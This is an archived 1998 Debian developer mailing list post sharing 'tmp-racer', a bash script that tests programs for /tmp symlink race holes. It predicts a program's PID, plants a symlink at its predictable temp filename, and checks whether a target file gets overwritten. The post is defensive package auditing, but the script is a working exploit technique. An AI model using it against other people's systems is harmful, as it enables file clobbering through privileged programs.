checking for /tmp security holes

To: debian-devel@lists.debian.org
Subject: checking for /tmp security holes
From: Richard Kettlewell <rjk@greenend.org.uk>
Date: Tue, 10 Nov 98 23:50:43 +0000 (GMT)
Message-id: <[🔎] Pine.just.say.no.cSid5j7yq6@sfere.greenend.org.uk>

Hi.  Followers of the bug system will notice that I've submitted
several /tmp-related bug reports tonight.  I have a list of other
packages with scripts in to check, but right now it's bedtime.  I have
some ideas about large scale automated checking, which I have not yet
implemented.

I found the script below convenient for convincing myself that it was
possible to persuade chosen programs to follow symlinks in /tmp when
creating their temporary files.  I would welcome constructive comments
(up to and including ``you've completely missed the point!'' if that
is the case l-)

ttfn/rjk

#! /bin/bash
#
#    tmp-racer - stress a certain class of security hole
#    Copyright (C) 1998 Richard Kettlewell
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License
#    along with this program; if not, write to the Free Software
#    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#
# Usage:
#
#    tmp-racer <pattern> program ...
#
# e.g.
#
#    tmp-racer '/tmp/foo.%d' insecure-prog -option
#
# @(#) $Id: tmp-racer,v 1.2 1998/11/10 23:38:21 richard Exp $
#

set -e
set -C

pattern="$1"
shift

DIR=/tmp/dir.$$

trap "rm -rf ${DIR}" EXIT INT HUP TERM

rm -f ${DIR}
mkdir ${DIR}

echo Attempting to crack "$1"...
while true; do
  rm -f ${DIR}/*
  echo "this string set by tmp-racer" >${DIR}/target 
  cp ${DIR}/target ${DIR}/original
  # figure out where in the PID sequence we are
  true &                         # +1
  wait
  pid=$(($!+4))
  link=`printf $pattern $pid`    # +1
  rm -f ${link}                  # +1
  ln -s ${DIR}/target ${link}    # +1
  "$@" >/dev/null 2>&1 </dev/null &
  actualpid=$!
  set +e
  wait
  status=$?
  set -e
  echo "Expected pid: $pid"
  echo "Actual pid:   $actualpid"
  echo "Exit status: $status"
  if [ "$actualpid" = "$pid" ]; then 
    break
  fi
  echo "Whoops - wrong PID!  I'll try again."
  rm -f ${link}
done

if ! diff -q ${DIR}/target ${DIR}/original; then
  echo
  echo "I cracked $1"
  echo
else
  echo "I couldn't crack $1"
fi

exit 0

Reply to:

Follow-Ups:
- Re: checking for /tmp security holes
  - From: Joey Hess <joey@kitenet.net>

Prev by Date: bo mirrors ?
Next by Date: Re: checking for /tmp security holes
Previous by thread: Re: bo mirrors ?
Next by thread: Re: checking for /tmp security holes
Index(es):
- Date
- Thread